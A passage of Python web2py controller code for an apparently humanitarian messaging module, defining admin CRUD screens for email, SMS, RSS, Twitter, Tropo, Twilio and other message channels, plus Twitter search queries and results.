(T("Attachments"), "attachment.document_id"),
],
)
def prep(r):
s3db.msg_email.inbound.readable = False
if r.id:
s3db.msg_attachment.document_id.label = ""
return True
s3.prep = prep
return s3_rest_controller(c, "email")
# =============================================================================
def rss():
"""
RESTful CRUD controller for RSS feed posts
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_rss"
table = s3db.msg_rss
# To represent the description suitably
# If it is an image display an image
#table.description.represent = lambda description: HTML(description)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("RSS Post Details"),
title_list = T("RSS Posts"),
label_list_button = T("View RSS Posts"),
label_delete_button = T("Delete Post"),
msg_record_deleted = T("RSS Post deleted"),
msg_list_empty = T("No Posts available"),
)
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
list_fields = ["date",
"body",
],
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def sms_inbox():
"""
RESTful CRUD controller for the SMS Inbox
- all Inbound SMS Messages go here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_sms"
table = s3db[tablename]
s3.filter = (table.inbound == True)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("SMS Details"),
title_list = T("SMS InBox"),
label_list_button = T("View SMS InBox"),
label_delete_button = T("Delete SMS"),
msg_record_deleted = T("SMS deleted"),
msg_list_empty = T("No SMS currently in InBox"),
)
s3db.configure(tablename,
# Permissions-based
#deletable = False,
editable = False,
insertable = False,
list_fields = ["date",
"from_address",
"body",
],
)
return s3_rest_controller(c, "sms")
# -----------------------------------------------------------------------------
def twitter():
"""
Twitter RESTful Controller
@ToDo: Action Button to update async
"""
s3db.configure("msg_twitter",
editable = False,
insertable = False,
list_fields = ["date",
"from_address",
"to_address",
"body",
],
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def twitter_inbox():
"""
RESTful CRUD controller for the Twitter Inbox
- all Inbound Tweets (Directed Messages) are visible here
"""
if not auth.s3_logged_in():
session.error = T("Requires Login!")
redirect(URL(c="default", f="user",
args = "login",
))
tablename = "msg_twitter"
table = s3db.msg_twitter
s3.filter = (table.inbound == True)
table.inbound.readable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Tweet Details"),
title_list = T("Twitter InBox"),
label_list_button = T("View Twitter InBox"),
label_delete_button = T("Delete Tweet"),
msg_record_deleted = T("Tweet deleted"),
msg_list_empty = T("No Tweets currently in InBox"),
)
s3db.configure(tablename,
editable = False,
insertable = False,
list_fields = ["date",
"from_address",
"body",
],
)
return s3_rest_controller(c, "twitter")
# =============================================================================
def tropo():
"""
Receive a JSON POST from the Tropo WebAPI
@see: https://www.tropo.com/docs/webapi/newhowitworks.htm
"""
# Stored in modules/tropo.py
from tropo import Tropo, Session
try:
s = Session(request.body.read())
t = Tropo()
# This is their service contacting us, so parse their request
try:
row_id = s.parameters["row_id"]
# This is an Outbound message which we've requested Tropo to send for us
table = s3db.msg_tropo_scratch
query = (table.row_id == row_id)
row = db(query).select(limitby = (0, 1),
).first()
# Send the message
#t.message(say_obj={"say":{"value":row.message}},to=row.recipient,network=row.network)
t.call(to=row.recipient, network=row.network)
t.say(row.message)
# Update status to sent in Outbox
outbox = s3db.msg_outbox
db(outbox.id == row.row_id).update(status = 2)
# @ToDo: Set message log to actioned
#log = s3db.msg_log
#db(log.id == row.message_id).update(actioned=True)
# Clear the Scratchpad
db(query).delete()
return t.RenderJson()
except:
# This is an Inbound message
try:
message = s.initialText
# This is an SMS/IM
# Place it in the InBox
uuid = s.id
recipient = s.to["id"]
try:
fromaddress = s.fromaddress["id"]
except:
# SyntaxError: s.from => invalid syntax (why!?)
fromaddress = ""
# @ToDo: Update to new model
#s3db.msg_log.insert(uuid=uuid, fromaddress=fromaddress,
# recipient=recipient, message=message,
# inbound=True)
# Send the message to the parser
reply = msg.parse_message(message)
t.say([reply])
return t.RenderJson()
except:
# This is a Voice call
# - we can't handle these yet
raise HTTP(501)
except:
# GET request or some random POST
pass
# =============================================================================
@auth.s3_requires_membership(1)
def sms_outbound_gateway():
""" SMS Outbound Gateway selection for the messaging framework """
# CRUD Strings
s3.crud_strings["msg_sms_outbound_gateway"] = Storage(
label_create = T("Create SMS Outbound Gateway"),
title_display = T("SMS Outbound Gateway Details"),
title_list = T("SMS Outbound Gateways"),
title_update = T("Edit SMS Outbound Gateway"),
label_list_button = T("List SMS Outbound Gateways"),
label_delete_button = T("Delete SMS Outbound Gateway"),
msg_record_created = T("SMS Outbound Gateway added"),
msg_record_modified = T("SMS Outbound Gateway updated"),
msg_record_deleted = T("SMS Outbound Gateway deleted"),
msg_list_empty = T("No SMS Outbound Gateways currently registered"),
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
def channel():
"""
RESTful CRUD controller for Channels
- unused
"""
return s3_rest_controller()
# -----------------------------------------------------------------------------
def email_channel():
"""
RESTful CRUD controller for Inbound Email channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_email_channel"
table = s3db[tablename]
table.server.label = T("Server")
table.protocol.label = T("Protocol")
table.use_ssl.label = "SSL"
table.port.label = T("Port")
table.username.label = T("Username")
table.password.label = T("Password")
table.delete_from_server.label = T("Delete from Server?")
table.port.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Port"),
T("For POP-3 this is usually 110 (995 for SSL), for IMAP this is usually 143 (993 for IMAP)."),
),
)
table.delete_from_server.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Delete"),
T("If this is set to True then mails will be deleted from the server after downloading."),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Email Settings"),
title_list = T("Email Accounts"),
label_create = T("Create Email Account"),
title_update = T("Edit Email Settings"),
label_list_button = T("View Email Accounts"),
msg_record_created = T("Account added"),
msg_record_deleted = T("Email Account deleted"),
msg_list_empty = T("No Accounts currently defined"),
msg_record_modified = T("Email Settings updated"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args = ["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def facebook_channel():
"""
RESTful CRUD controller for Facebook channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_facebook_channel"
table = s3db[tablename]
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Facebook Settings"),
title_list = T("Facebook Accounts"),
label_create = T("Add Facebook Account"),
title_update = T("Edit Facebook Settings"),
label_list_button = T("View Facebook Accounts"),
msg_record_created = T("Account added"),
msg_record_deleted = T("Facebook Account deleted"),
msg_list_empty = T("No Accounts currently defined"),
msg_record_modified = T("Facebook Settings updated"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
#if not s3task._is_alive():
# # No Scheduler Running
# s3.actions += [{"label": s3_str(T("Poll")),
# "restrict": restrict_d),
# "url": URL(args = ["[id]", "poll"]),
# "_class": "action-btn",
# }
# ]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def mcommons_channel():
"""
RESTful CRUD controller for Mobile Commons SMS Channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_mcommons_channel"
table = s3db[tablename]
table.name.label = T("Account Name")
table.name.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Account Name"),
T("Name for your Mobile Commons Account"),
),
)
table.campaign_id.label = T("Campaign ID")
table.url.label = T("URL")
table.url.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("URL"),
T("URL for the Mobile Commons API"),
),
)
table.username.label = T("Username")
table.password.label = T("Password")
table.timestmp.label = T("Last Downloaded")
table.timestmp.writable = False
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Mobile Commons Setting Details"),
title_list = T("Mobile Commons Settings"),
label_create = T("Add Mobile Commons Settings"),
title_update = T("Edit Mobile Commons Settings"),
label_list_button = T("View Mobile Commons Settings"),
msg_record_created = T("Mobile Commons Setting added"),
msg_record_deleted = T("Mobile Commons Setting deleted"),
msg_list_empty = T("No Mobile Commons Settings currently defined"),
msg_record_modified = T("Mobile Commons settings updated"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def gcm_channel():
"""
RESTful CRUD controller for Google Cloud Messaging Channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_gcm_channel"
table = s3db[tablename]
table.name.label = T("Account Name")
table.name.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Account Label"),
T("Label for GCM Account"),
),
)
table.api_key.label = T("API KEY")
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Google Cloud Messaging Setting Details"),
title_list = T("Google Cloud Messaging Settings"),
label_create = T("Add Google Cloud Messaging Settings"),
title_update = T("Edit Google Cloud Messaging Settings"),
label_list_button = T("View Google Cloud Messaging Settings"),
msg_record_created = T("Google Cloud Messaging Setting added"),
msg_record_deleted = T("Google Cloud Messaging Setting deleted"),
msg_list_empty = T("No Google Cloud Messaging Settings currently defined"),
msg_record_modified = T("Google Cloud Messaging settings updated"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted != True)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
#if not s3task._is_alive():
# No Scheduler Running
# s3.actions += [{"label": s3_str(T("Poll")),
# "restrict": restrict_d,
# "url": URL(args = ["[id]", "poll"]),
# "_class": "action-btn",
# },
# ]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def rss_channel():
"""
RESTful CRUD controller for RSS channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_rss_channel"
table = s3db[tablename]
table.name.label = T("Name")
table.description.label = T("Description")
table.url.label = T("URL/Link")
table.url.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("URL"),
T("Link for the RSS Feed."),
),
)
table.enabled.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Subscriptions Status"),
T("Are you susbscribed?"),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("RSS Channel Details"),
title_list = T("RSS Channels"),
label_create = T("Add RSS Channel"),
title_update = T("Edit RSS Channel"),
label_list_button = T("View RSS Channels"),
msg_record_created = T("Channel added"),
msg_record_deleted = T("RSS Channel deleted"),
msg_list_empty = T("No RSS Channels currently defined"),
msg_record_modified = T("RSS Channel updated"),
)
def status_represent(v):
try:
v = int(v)
except:
# Text
return v
return "There have been no new entries for %s requests" % v
s3db.msg_channel_status.status.represent = status_represent
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Subscribe")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Unsubscribe")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def twilio_channel():
"""
RESTful CRUD controller for Twilio SMS channels
- appears in the administration menu
"""
if not auth.s3_has_role("ADMIN"):
auth.permission.fail()
tablename = "msg_twilio_channel"
table = s3db[tablename]
table.account_name.label = T("Account Name")
table.account_name.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Account Name"),
T("Identifier Name for your Twilio Account."),
),
)
table.url.label = T("URL")
table.url.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("URL"),
T("URL for the twilio API."),
),
)
table.account_sid.label = "Account SID"
table.auth_token.label = T("AUTH TOKEN")
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Twilio Channel Details"),
title_list = T("Twilio Channels"),
label_create = T("Add Twilio Channel"),
title_update = T("Edit Twilio Channel"),
label_list_button = T("View Twilio Channels"),
msg_record_created = T("Twilio Channel added"),
msg_record_deleted = T("Twilio Channel deleted"),
msg_record_modified = T("Twilio Channel updated"),
msg_list_empty = T("No Twilio Channels currently defined"),
)
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def sms_modem_channel():
"""
RESTful CRUD controller for modem channels
- appears in the administration menu
Multiple Modems can be configured to receive Inbound Messages
"""
try:
import serial
except ImportError:
session.error = T("Python Serial module not available within the running Python - this needs installing to activate the Modem")
redirect(URL(c="admin", f="index"))
tablename = "%s_%s" % (c, f)
table = s3db[tablename]
table.modem_port.label = T("Port")
table.modem_baud.label = T("Baud")
table.enabled.label = T("Enabled")
table.modem_port.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Port"),
T("The serial port at which the modem is connected - /dev/ttyUSB0, etc on linux and com1, com2, etc on Windows"),
),
)
table.modem_baud.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Baud"),
T("Baud rate to use for your modem - The default is safe for most cases"),
),
)
table.enabled.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Enabled"),
T("Unselect to disable the modem"),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
label_create = T("Add Modem Channel"),
title_display = T("Modem Channel Details"),
title_list = T("Modem Channels"),
title_update = T("Edit Modem Channel"),
label_list_button = T("View Modem Channels"),
msg_record_created = T("Modem Channel added"),
msg_record_modified = T("Modem Channel updated"),
msg_record_deleted = T("Modem Channel deleted"),
msg_list_empty = T("No Modem Channels currently defined"),
)
return s3_rest_controller()
#------------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def sms_smtp_channel():
"""
RESTful CRUD controller for SMTP to SMS Outbound channels
- appears in the administration menu
"""
tablename = "%s_%s" % (c, f)
table = s3db[tablename]
table.address.label = T("Address")
table.subject.label = T("Subject")
table.enabled.label = T("Enabled")
table.address.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Address"),
T("Email Address to which to send SMS messages. Assumes sending to phonenumber@address"),
),
)
table.subject.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Subject"),
T("Optional Subject to put into Email - can be used as a Security Password by the service provider"),
),
)
table.enabled.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Enabled"),
T("Unselect to disable this SMTP service"),
),
)
# CRUD Strings
s3.crud_strings["msg_sms_outbound_gateway"] = Storage(
label_create=T("Create SMTP to SMS Channel"),
title_display=T("SMTP to SMS Channel Details"),
title_list=T("SMTP to SMS Channels"),
title_update=T("Edit SMTP to SMS Channel"),
label_list_button=T("List SMTP to SMS Channels"),
label_delete_button=T("Delete SMTP to SMS Channel"),
msg_record_created=T("SMTP to SMS Channel added"),
msg_record_modified=T("SMTP to SMS Channel updated"),
msg_record_deleted=T("SMTP to SMS Channel deleted"),
msg_list_empty=T("No SMTP to SMS Channels currently registered"),
)
s3db.configure(tablename,
update_next = URL(args = [1, "update"]),
)
return s3_rest_controller()
#------------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def sms_webapi_channel():
"""
RESTful CRUD controller for Web API channels
- appears in the administration menu
"""
tablename = "%s_%s" % (c, f)
table = s3db[tablename]
table.url.label = T("URL")
table.message_variable.label = T("Message variable")
table.to_variable.label = T("To variable")
table.username.label = T("Username")
table.password.label = T("Password")
table.enabled.label = T("Enabled")
table.url.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("URL"),
T("The URL of your web gateway without the POST parameters"),
),
)
table.parameters.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Parameters"),
T("The POST variables other than the ones containing the message and the phone number"),
),
)
table.message_variable.comment = DIV(_class = "tooltip",
_title="%s|%s" % (T("Message Variable"),
T("The POST variable on the URL used for sending messages"),
),
)
table.to_variable.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("To variable"),
T("The POST variable containing the phone number"),
),
)
    table.username.comment = DIV(_class = "tooltip",
                                 _title = "%s|%s" % (T("Username"),
                                                     T("If the service requires HTTP BASIC Auth (e.g. Mobile Commons)"),
                                                     ),
                                 )
    table.password.comment = DIV(_class = "tooltip",
                                 _title = "%s|%s" % (T("Password"),
                                                     T("If the service requires HTTP BASIC Auth (e.g. Mobile Commons)"),
                                                     ),
                                 )
table.enabled.comment = DIV(_class = "tooltip",
_title="%s|%s" % (T("Enabled"),
T("Unselect to disable this API service"),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
label_create = T("Create Web API Channel"),
title_display = T("Web API Channel Details"),
title_list = T("Web API Channels"),
title_update = T("Edit Web API Channel"),
label_list_button = T("List Web API Channels"),
label_delete_button = T("Delete Web API Channel"),
msg_record_created = T("Web API Channel added"),
msg_record_modified = T("Web API Channel updated"),
msg_record_deleted = T("Web API Channel deleted"),
msg_list_empty = T("No Web API Channels currently registered"),
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def tropo_channel():
"""
RESTful CRUD controller for Tropo channels
- appears in the administration menu
"""
tablename = "msg_tropo_channel"
table = s3db[tablename]
table.token_messaging.label = T("Tropo Messaging Token")
table.token_messaging.comment = DIV(DIV(_class = "stickytip",
_title = "%s|%s" % (T("Tropo Messaging Token"),
T("The token associated with this application on") + " <a href='https://www.tropo.com/docs/scripting/troposessionapi.htm' target=_blank>Tropo.com</a>"),
),
)
#table.token_voice.label = T("Tropo Voice Token")
#table.token_voice.comment = DIV(DIV(_class="stickytip",_title=T("Tropo Voice Token") + "|" + T("The token associated with this application on") + " <a href='https://www.tropo.com/docs/scripting/troposessionapi.htm' target=_blank>Tropo.com</a>"))
# CRUD Strings
s3.crud_strings[tablename] = Storage(
label_create = T("Create Tropo Channel"),
title_display = T("Tropo Channel Details"),
title_list = T("Tropo Channels"),
title_update = T("Edit Tropo Channel"),
label_list_button = T("List Tropo Channels"),
label_delete_button = T("Delete Tropo Channel"),
msg_record_created = T("Tropo Channel added"),
msg_record_modified = T("Tropo Channel updated"),
msg_record_deleted = T("Tropo Channel deleted"),
msg_list_empty = T("No Tropo Channels currently registered"),
)
return s3_rest_controller()
# -----------------------------------------------------------------------------
@auth.s3_requires_membership(1)
def twitter_channel():
"""
RESTful CRUD controller for Twitter channels
- appears in the administration menu
Only 1 of these normally in existence
@ToDo: Don't enforce
"""
#try:
# import tweepy
#except:
# session.error = T("tweepy module not available within the running Python - this needs installing for non-Tropo Twitter support!")
# redirect(URL(c="admin", f="index"))
tablename = "%s_%s" % (c, f)
table = s3db[tablename]
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Twitter account Details"),
title_list = T("Twitter accounts"),
label_create = T("Add Twitter account"),
title_update = T("Edit Twitter account"),
label_list_button = T("View Twitter accounts"),
msg_record_created = T("Twitter account added"),
msg_record_deleted = T("Twitter account deleted"),
msg_record_modified = T("Twitter account updated"),
msg_list_empty = T("No Twitter accounts currently defined"),
)
def prep(r):
oauth_consumer_key = settings.msg.twitter_oauth_consumer_key
oauth_consumer_secret = settings.msg.twitter_oauth_consumer_secret
if not (oauth_consumer_key and oauth_consumer_secret):
session.error = T("You should edit Twitter settings in models/000_config.py")
return True
oauth = tweepy.OAuthHandler(oauth_consumer_key,
oauth_consumer_secret)
if r.http == "GET" and r.method in ("create", "update"):
# We're showing the form
_s3 = session.s3
try:
_s3.twitter_oauth_url = oauth.get_authorization_url()
_s3.twitter_request_key = oauth.request_token.key
_s3.twitter_request_secret = oauth.request_token.secret
except tweepy.TweepError:
session.error = T("Problem connecting to twitter.com - please refresh")
return True
#table.pin.readable = True
#table.pin.label = T("PIN number from Twitter (leave empty to detach account)")
#table.pin.value = ""
table.twitter_account.label = T("Current Twitter account")
return True
else:
# Not showing form, no need for pin
#table.pin.readable = False
#table.pin.label = T("PIN") # won't be seen
#table.pin.value = "" # but let's be on the safe side
pass
return True
#s3.prep = prep
# Post-process
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons for Enable/Disable
table = r.table
query = (table.deleted == False)
rows = db(query).select(table.id,
table.enabled,
)
restrict_e = [str(row.id) for row in rows if not row.enabled]
restrict_d = [str(row.id) for row in rows if row.enabled]
s3.actions += [{"label": s3_str(T("Enable")),
"restrict": restrict_e,
"url": URL(args=["[id]", "enable"]),
"_class": "action-btn",
},
{"label": s3_str(T("Disable")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "disable"]),
"_class": "action-btn",
},
]
if not s3task._is_alive():
# No Scheduler Running
s3.actions += [{"label": s3_str(T("Poll")),
"restrict": restrict_d,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
]
#if isinstance(output, dict):
# if r.http == "GET" and r.method in ("create", "update"):
# rheader = A(T("Collect PIN from Twitter"),
# _href = session.s3.twitter_oauth_url,
# _target = "_blank")
# output["rheader"] = rheader
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def inject_search_after_save(output):
"""
Inject a Search After Save checkbox
in the Twitter Search Query Form
"""
if "form" in output:
id = "search_after_save"
label = LABEL("%s:" % T("Search After Save?"),
_for = "msg_twitter_search",
)
widget = INPUT(_name = "search_after_save",
_type = "checkbox",
value = "on",
_id = id,
_class = "boolean",
)
comment = ""
if s3_formstyle == "bootstrap":
_controls = DIV(widget,
comment,
_class = "controls",
)
row = DIV(label,
_controls,
_class = "control-group",
_id = "%s__row" % id,
)
elif callable(s3_formstyle):
row = s3_formstyle(id, label, widget, comment)
        else:
            # Unsupported formstyle
            raise NotImplementedError("Unsupported formstyle")
output["form"][0][-2].append(row)
# -----------------------------------------------------------------------------
def action_after_save(form):
"""
Schedules Twitter query search immediately after save
depending on flag
"""
if request.post_vars.get("search_after_save"):
s3task.run_async("msg_twitter_search", args = [form.vars.id])
session.information = T("The search results should appear shortly - refresh to see them")
# -----------------------------------------------------------------------------
def twitter_search():
"""
RESTful CRUD controller to add keywords
for Twitter Search
"""
tablename = "msg_twitter_search"
table = s3db[tablename]
table.is_processed.writable = False
table.is_searched.writable = False
table.is_processed.readable = False
table.is_searched.readable = False
# Tweak languages to those supported by Twitter
S3Msg = s3base.S3Msg()
try:
import tweepy
except:
session.error = T("tweepy module not available within the running Python - this needs installing for non-Tropo Twitter support!")
redirect(URL(c="msg", f="index"))
twitter_settings = S3Msg.get_twitter_api()
supported_languages = ['fr', 'en', 'ar', 'ja', 'es', 'de', 'it', 'id', 'pt', 'ko', 'tr', 'ru', 'nl', 'fil',
'msa', 'zh-tw', 'zh-cn', 'hi', 'no', 'sv', 'fi', 'da', 'pl', 'hu', 'fa', 'he', 'ur', 'th']
if twitter_settings:
twitter_api = twitter_settings[0]
try:
supported_languages = [str(x["code"]) for x in twitter_api.supported_languages()]
except (tweepy.TweepError, AttributeError):
# List according to Twitter 1.1 API https://dev.twitter.com/docs/api/1.1/get/help/languages
pass
substitute_list = {"en-gb": "en",
"pt-br": "pt"}
new_langs = []
lang_default = current.response.s3.language
langs = set(settings.get_L10n_languages().keys())
for l in langs:
if l in supported_languages:
new_langs.append(l)
else:
supported_substitute = substitute_list.get(l)
if supported_substitute:
if lang_default == l:
lang_default = supported_substitute
if supported_substitute not in langs:
new_langs.append(supported_substitute)
else:
if lang_default == l:
lang_default = 'en'
langs = new_langs
table.lang.requires = IS_IN_SET(langs)
table.lang.default = lang_default
comment = "Add the keywords separated by single spaces."
table.keywords.comment = DIV(_class = "tooltip",
_title = "%s|%s" % (T("Keywords"),
T(comment),
),
)
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Twitter Search Queries"),
title_list = T("Twitter Search Queries"),
label_create = T("Add Twitter Search Query"),
title_update = T("Edit Twitter Search Query"),
label_list_button = T("View Queries"),
msg_record_created = T("Query added"),
msg_record_deleted = T("Query deleted"),
msg_list_empty = T("No Query currently defined"),
msg_record_modified = T("Query updated"),
)
if request.post_vars.get("search_after_save"):
url_after_save = URL(f="twitter_result")
else:
url_after_save = None
s3db.configure(tablename,
create_next = url_after_save,
create_onaccept = action_after_save,
deletable = True,
listadd = True,
)
def prep(r):
if r.interactive:
table = s3db.msg_twitter_channel
if not db(table.id > 0).select(table.id,
limitby = (0, 1),
).first():
session.error = T("Need to configure Twitter Authentication")
redirect(URL(f = "twitter_channel"))
return True
s3.prep = prep
def postp(r, output):
if r.interactive:
# Normal Action Buttons
s3_action_buttons(r)
# Custom Action Buttons
rtable = r.table
query = (rtable.deleted == False) & \
(rtable.is_searched == False)
records = db(query).select(rtable.id)
restrict_s = [str(record.id) for record in records]
query = (rtable.deleted == False) & \
(rtable.is_processed == False)
records = db(query).select(rtable.id)
restrict_k = [str(record.id) for record in records]
# @ToDo: Make these S3Methods rather than additional controllers
s3.actions += [{"label": s3_str(T("Search")),
"restrict": restrict_s,
"url": URL(args = ["[id]", "poll"]),
"_class": "action-btn",
},
{"label": s3_str(T("Analyze with KeyGraph")),
"restrict": restrict_k,
"url": URL(args = ["[id]", "keygraph"]),
"_class": "action-btn",
},
]
inject_search_after_save(output)
return output
s3.postp = postp
return s3_rest_controller()
# -----------------------------------------------------------------------------
def twitter_result():
"""
RESTful CRUD controller for Twitter Search Results.
"""
tablename = "msg_twitter_result"
# CRUD Strings
s3.crud_strings[tablename] = Storage(
title_display = T("Twitter Search Results"),
title_list = T("Twitter Search Results"),
label_list_button = T("View Tweets"),
msg_record_deleted = T("Tweet deleted"),
msg_list_empty = T("No Tweets Available."),
)
from s3.s3filter import S3DateFilter, S3TextFilter
filter_widgets = [
S3DateFilter("date",
label = T("Tweeted on"),
hide_time = True,
_class = "date-filter-class",
comment = T("Filter Tweets by the date they were tweeted on"),
),
S3TextFilter("from_address",
label = T("Tweeted by"),
_class = "tweeter-filter-class",
comment = T("Filter Tweets by who tweeted them"),
)
]
report_fields = ["search_id",
"date",
"lang",
]
report_options = Storage(
rows=report_fields,
cols=report_fields,
fact=report_fields,
defaults=Storage(
rows="search_id",
cols="lang",
totals=True,
)
)
s3db.configure(tablename,
deletable = False,
editable = False,
insertable = False,
filter_widgets = filter_widgets,
report_options = report_options,
)
def postp(r, output):
if r.id or r.method in ("read", "display"):
# Display the Tweet as an Embedded tweet
record = output["item"].record
# Tweet link
twitter_url = "https://twitter.com/%s/statuses/%s" % (record.from_address,
